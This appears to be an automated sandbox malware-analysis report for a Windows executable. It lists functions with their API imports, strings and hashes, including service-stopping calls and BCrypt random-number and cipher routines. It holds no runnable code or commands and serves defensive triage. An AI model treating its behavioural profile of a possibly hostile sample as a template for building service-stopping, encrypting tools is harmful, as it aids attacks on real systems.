Function 00007FF6F18C48C0 Relevance: 16.4, APIs: 8, Strings: 1, Instructions: 626
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6F18C48FD
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18C49F8
memmove.VCRUNTIME140 ref: 00007FF6F18C4A19
memset.VCRUNTIME140 ref: 00007FF6F18C4A28
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18C4A32
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18C4A45
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18C4A51
memset.VCRUNTIME140 ref: 00007FF6F18C4A63

Strings

, xrefs: 00007FF6F18C4B6C

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _errno$memset$_invalid_parameter_noinfofreememmove
String ID:
API String ID: 4025154296-3916222277
Opcode ID: c053c19a76897f507298a9e536f113175db39d14dab8922e58873422ee272503
Instruction ID: c8abffe500d892cca5df900a477cc46021d40a84dd74808afb523ba04feff084
Opcode Fuzzy Hash: c053c19a76897f507298a9e536f113175db39d14dab8922e58873422ee272503
Instruction Fuzzy Hash: 845297B36249A44BD302CF2995149BE3BA4EB5D345B854711EBA68B7C0CE3CF915EF20

Function 00007FF6F18B7A80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

BCryptGenRandom.BCRYPT ref: 00007FF6F18B7B2E
BCryptCloseAlgorithmProvider.BCRYPT ref: 00007FF6F18B7B48
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6F18B7B6F
SetLastError.KERNEL32 ref: 00007FF6F18B7BA6

Part of subcall function 00007FF6F18B7500: GetLastError.KERNEL32 ref: 00007FF6F18B752C
Part of subcall function 00007FF6F18B7500: memmove.VCRUNTIME140 ref: 00007FF6F18B75D5

_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B7BD9

Part of subcall function 00007FF6F18CE660: AcquireSRWLockExclusive.KERNEL32 ref: 00007FF6F18CE670

Strings

BCryptGenRandom, xrefs: 00007FF6F18B7BAC

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: CryptErrorLast$AcquireAlgorithmCloseExceptionExclusiveLockProviderRandomThrowfreememmove
String ID: BCryptGenRandom
API String ID: 548136003-3013187443
Opcode ID: b97b5cdcb7384609a645a121b1d1b5e4ef8c60fc4ec722f09304880976647378
Instruction ID: 76e0b21010867cc44c3be8012c0bbcb87c0d169b42ba14dfc677a0c1eaf9208c
Opcode Fuzzy Hash: b97b5cdcb7384609a645a121b1d1b5e4ef8c60fc4ec722f09304880976647378
Instruction Fuzzy Hash: 21415F21A28B8295EB20EB61EA506B96761FF847D0F441235DA7DC36E5EF3CE545CB00

Function 00007FF6F18CE0C0 Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNELBASE ref: 00007FF6F18CE0C9

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b46cb798c7cb54dc8782471115466e98de31e4b37c053175dd5771e29f631880
Instruction ID: 8b7509c6238c08b5734a2dbe5d9c8385a122184533e83f8506001b08c6ee0664
Opcode Fuzzy Hash: b46cb798c7cb54dc8782471115466e98de31e4b37c053175dd5771e29f631880
Instruction Fuzzy Hash: 85C09210E3E603D2E30837A10A820B919925F453D0F100232E13DD16E2BF5C24A22B52

Function 00007FF6F18A73F0 Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 162
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerW.ADVAPI32 ref: 00007FF6F18A7414
GetLastError.KERNEL32 ref: 00007FF6F18A7438
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6F18A7443
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A7453
OpenServiceW.ADVAPI32 ref: 00007FF6F18A74CD
ControlService.ADVAPI32 ref: 00007FF6F18A7542
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A75E2
CloseServiceHandle.ADVAPI32 ref: 00007FF6F18A75EB
CloseServiceHandle.ADVAPI32 ref: 00007FF6F18A7662

Part of subcall function 00007FF6F18AB370: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB3E9
Part of subcall function 00007FF6F18AB370: ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB409
Part of subcall function 00007FF6F18AB370: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB419
Part of subcall function 00007FF6F18AB370: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB4FC
Part of subcall function 00007FF6F18AB370: ?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB503
Part of subcall function 00007FF6F18AB370: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB510

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A7695

Strings

OpenService failed for , xrefs: 00007FF6F18A75FA
stopped successfully., xrefs: 00007FF6F18A7578
ControlService failed for , xrefs: 00007FF6F18A7590
with error: , xrefs: 00007FF6F18A75B5, 00007FF6F18A761F
Service , xrefs: 00007FF6F18A7553
OpenSCManager failed with error: , xrefs: 00007FF6F18A7429

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$V01@$Service$??6?$basic_ostream@$?good@ios_base@std@@CloseHandleOpenV01@@$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exceptions@std@@ControlErrorLastManagerOsfx@?$basic_ostream@V12@_invalid_parameter_noinfo_noreturn
String ID: stopped successfully.$ with error: $ControlService failed for $OpenSCManager failed with error: $OpenService failed for $Service
API String ID: 2585847418-2969218038
Opcode ID: 97f9fa63221918c2ecea67cca088f683bc3ac6efee5b930e716397e102193402
Instruction ID: 216879ddd7c71b20c389814b5e482f8a3ca85d8538c1e1516eaa30d4519b9b6b
Opcode Fuzzy Hash: 97f9fa63221918c2ecea67cca088f683bc3ac6efee5b930e716397e102193402
Instruction Fuzzy Hash: CD713765B28B8792EB14EB26E64427937A2AF45BC4F005132DD7E877E9EF3CE4458340

Function 00007FF6F18AB370 Relevance: 13.6, APIs: 9, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB3E9
?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB409
?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB419
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB466
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB48F
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB4B6
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB4FC
?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB503
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB510

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
String ID:
API String ID: 4121003011-0
Opcode ID: 3462d9b7555ee2de00ba9a5cf3846b59dc205635d2c231214787e45c29ca3882
Instruction ID: 86d540f28715f7e0fede8a45ad7c33f917297dc23157c80f6face401150ba62b
Opcode Fuzzy Hash: 3462d9b7555ee2de00ba9a5cf3846b59dc205635d2c231214787e45c29ca3882
Instruction Fuzzy Hash: 24510132619A4192EB208F1AE6D0239ABA1FF85FD5B15C532CE7E877E0DF39D4469300

Function 00007FF6F18AD310 Relevance: 13.6, APIs: 9, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6F18AD375
?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6F18AD395
?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6F18AD3A5
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6F18AD3EC
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF6F18AD419
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6F18AD43A
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6F18AD480
?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF6F18AD487
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF6F18AD494

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
String ID:
API String ID: 4121003011-0
Opcode ID: 63d12ad91d8d052035e74c89f684042e8a42cf7a3404af68e9b38cf56b28d611
Instruction ID: 246158e1741331d29a4de69566f5f1fddde30ebca30644ae8f9dcd4873990928
Opcode Fuzzy Hash: 63d12ad91d8d052035e74c89f684042e8a42cf7a3404af68e9b38cf56b28d611
Instruction Fuzzy Hash: 97510322619A4192EB109F1AD6D4239ABA1EF84FD5B158632CE7FC77E0EF3DD4468700

Function 00007FF6F18CE0DC Relevance: 10.6, APIs: 7, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_release_startup_lock.LIBCMT ref: 00007FF6F18CE173
_register_thread_local_exe_atexit_callback.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18CE1C1
_get_initial_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18CE1C6
__p___argv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18CE1CE
__p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18CE1D6
_cexit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18CE1F8
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18CE252

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: __p___argc__p___argv__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
String ID:
API String ID: 1328870896-0
Opcode ID: 5987aea95579cd77aaa9fd0ad415828929488927b8469b89735c87e27d90c774
Instruction ID: f409463ce9fbb4d30063226281741eb9fcc6ffbfbba287e797d4b6e706c78b73
Opcode Fuzzy Hash: 5987aea95579cd77aaa9fd0ad415828929488927b8469b89735c87e27d90c774
Instruction Fuzzy Hash: 84315B21E2C64386FB14AB65A7513B92B91AF857C4F444235EA7DE72D3FF2CB404A740

Function 00007FF6F18B73F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetLastError.KERNEL32 ref: 00007FF6F18B7454
_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B7487
__std_exception_copy.VCRUNTIME140 ref: 00007FF6F18B74BD

Strings

RNG, xrefs: 00007FF6F18B741F
BCryptOpenAlgorithmProvider, xrefs: 00007FF6F18B745A
Microsoft Primitive Provider, xrefs: 00007FF6F18B7418

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: ErrorExceptionLastThrow__std_exception_copy
String ID: BCryptOpenAlgorithmProvider$Microsoft Primitive Provider$RNG
API String ID: 160102542-2191745741
Opcode ID: 9242949c5363bc01ddcdd0a36b89c6e69421f7e38dcfa858ad304915a2ff4439
Instruction ID: abb2b382359b004f52a681362a99d8cce9892b163445ddec93df7d2d0f9ae18f
Opcode Fuzzy Hash: 9242949c5363bc01ddcdd0a36b89c6e69421f7e38dcfa858ad304915a2ff4439
Instruction Fuzzy Hash: 16218F62A28B46A1EB109F64EA503A97361FF54784F405132D67C876A5FF3CE559C340

Function 00007FF6F18B8A50 Relevance: 7.5, APIs: 5, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18A11F8), ref: 00007FF6F18B8A5D
?set_new_handler@std@@YAP6AXXZP6AXXZ@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18A11F8), ref: 00007FF6F18B8A6A
?set_new_handler@std@@YAP6AXXZP6AXXZ@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18A11F8), ref: 00007FF6F18B8A7A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18A11F8), ref: 00007FF6F18B8A84
_CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18A11F8), ref: 00007FF6F18B8AB0

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: ?set_new_handler@std@@malloc$ExceptionThrow
String ID:
API String ID: 1468705217-0
Opcode ID: 3e3b4191124bf01ac2182a653dbe02a0b105a4859c853f67138aa2f096f8bec7
Instruction ID: bd115aa4b162212aaa56a269f48c935b1b6ba7fcfcdb9343a33c673200748b86
Opcode Fuzzy Hash: 3e3b4191124bf01ac2182a653dbe02a0b105a4859c853f67138aa2f096f8bec7
Instruction Fuzzy Hash: B0F0BE12B2D74341EF64A726F6801B86362AF85BC0F484539D63E827D6FF3CE5008301

Function 00007FF6F18B1BB0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B1C6C

Strings

: this object doesn't support a special last block, xrefs: 00007FF6F18B1C3E

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: ExceptionThrow
String ID: : this object doesn't support a special last block
API String ID: 432778473-2028240571
Opcode ID: 47f8e7ea62875c6c0e2d49a71016d77fed404429af8c742b563867617be4b125
Instruction ID: 1c657edfc520c6702644f01ee3601d05cbbae5767a85a7c6b0141bca4ba78cab
Opcode Fuzzy Hash: 47f8e7ea62875c6c0e2d49a71016d77fed404429af8c742b563867617be4b125
Instruction Fuzzy Hash: C131C162714B8992EB20DB16E9147AA6360FF89FC4F444032DF6D877A5EF2CD509C700

Function 00007FF6F18AB550 Relevance: 4.5, APIs: 3, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z.MSVCP140 ref: 00007FF6F18AB565
?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z.MSVCP140 ref: 00007FF6F18AB571
?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6F18AB57A

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$V12@$?flush@?$basic_ostream@?put@?$basic_ostream@?widen@?$basic_ios@
String ID:
API String ID: 1875450691-0
Opcode ID: 443187194c09cde17285622938cc0493cdbe5d21a2750599dc9375fd71388739
Instruction ID: 98e844617643ec7232c6379f79744f43a1850334be10ba98e37194d22f05b4c4
Opcode Fuzzy Hash: 443187194c09cde17285622938cc0493cdbe5d21a2750599dc9375fd71388739
Instruction Fuzzy Hash: 2AD01251B9470781DB089F56B9541382711AF49FC1B0C5032CD2F86350DE3DD0558304

Function 00007FF6F18B96F0 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF6F18B977E

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _time64
String ID:
API String ID: 1670930206-0
Opcode ID: 22a958c5b4102628f872bb504c0af6238b6a5a6fc2fbbabefdb748feeaa96bdf
Instruction ID: 9a70031e5701c47b8e0e699f022a68f6f3af6e9c85e799c6d0095f48f1ff887d
Opcode Fuzzy Hash: 22a958c5b4102628f872bb504c0af6238b6a5a6fc2fbbabefdb748feeaa96bdf
Instruction Fuzzy Hash: 94316B32614B8482D760CF16E594B9ABBA4F789FC8F549025DFAD83B55DF39C065CB00

Non-executed Functions

Function 00007FF6F18A5F40 Relevance: 112.7, APIs: 48, Strings: 16, Instructions: 723networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6F18AB370: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB3E9
